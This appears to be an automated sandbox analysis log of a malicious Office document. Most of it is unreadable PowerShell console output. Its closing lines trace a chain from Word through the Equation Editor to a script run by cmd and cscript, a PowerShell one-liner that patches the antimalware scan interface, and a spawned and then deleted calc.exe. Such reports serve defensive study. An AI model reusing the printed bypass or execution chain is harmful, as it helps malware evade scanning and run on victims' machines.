          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............Y..k....(j;.............................}..v.....j;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..................k.... ...............................}..v....pq;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............Y..k....(r;.............................}..v.....r;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..................k.... ...............................}..v....py;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............Y..k....(z;.............................}..v.....z;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......;.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: Exception
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:195
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....e .............................}..v....@f .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....m .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....m .............................}..v....@n .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....u .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....u .............................}..v....@v .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....} .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k.....} .............................}..v....@~ .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.... ...............................}..v...... .....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Y..k...... .............................}..v....@. .....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......!.............................}..v....@.!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......!.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....H.!.............................}..v......!.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...xception
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:215
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......0.............................}..v....(.0.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v......1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v....(.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v..... 1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....!1.............................}..v....("1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....(1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....)1.............................}..v....(*1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....01.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....11.............................}..v....(21.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....81.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....91.............................}..v....(:1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....@1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....A1.............................}..v....(B1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....H1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....I1.............................}..v....(J1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................)".k.....I..............................}..v.....P1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k.....Q1.............................}..v....(R1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............)".k.....I..............................}..v.....X1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................!.k.....Y1.............................}..v....(Z1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............)".k.....I..............................}..v.....`1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................!.k.....a1.............................}..v....(b1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............)".k.....I..............................}..v.....h1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................!.k.....i1.............................}..v....(j1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............)".k.....I..............................}..v.....p1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................!.k.....q1.............................}..v....(r1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............)".k.....I..............................}..v....xw1.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................!.k....0x1.............................}..v.....x1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............)".k.....I..............................}..v....x.1.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................!.k....0.1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o....... . . .a.d.a.t.a.E.x.c.e.p.t.i.o.n...............}..v......1.....0................F......".......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................!.k....x.1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............)".k.....I..............................}..v......1.....0.......................\.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................!.k....................................}..v....P.1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......)".k.....I..............................}..v......1.....0................F..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................!.k......1.............................}..v......1.....0...............HG..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v.....OC.....0.......................~.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....PC.............................}..v.... QC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.6.............}..v....0UC.....0................i......$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....UC.............................}..v....hVC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0]C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....]C.............................}..v....h^C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0eC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....eC.............................}..v....hfC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0mC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....mC.............................}..v....hnC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0uC.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....uC.............................}..v....hvC.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0}C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....}C.............................}..v....h~C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.C.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......C.............................}..v....h.C.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0%D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....%D.............................}..v....h&D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0-D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....-D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....05D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....5D.............................}..v....h6D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0=D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....=D.............................}..v....h>D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0ED.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....ED.............................}..v....hFD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0MD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....MD.............................}..v....hND.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k.....m..............................}..v....0UD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............i..k.....UD.............................}..v....hVD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..................k.....m..............................}..v....0]D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............i..k.....]D.............................}..v....h^D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..................k.....m..............................}..v....0eD.....0...............................................Jump to behavior
          Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); ...
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
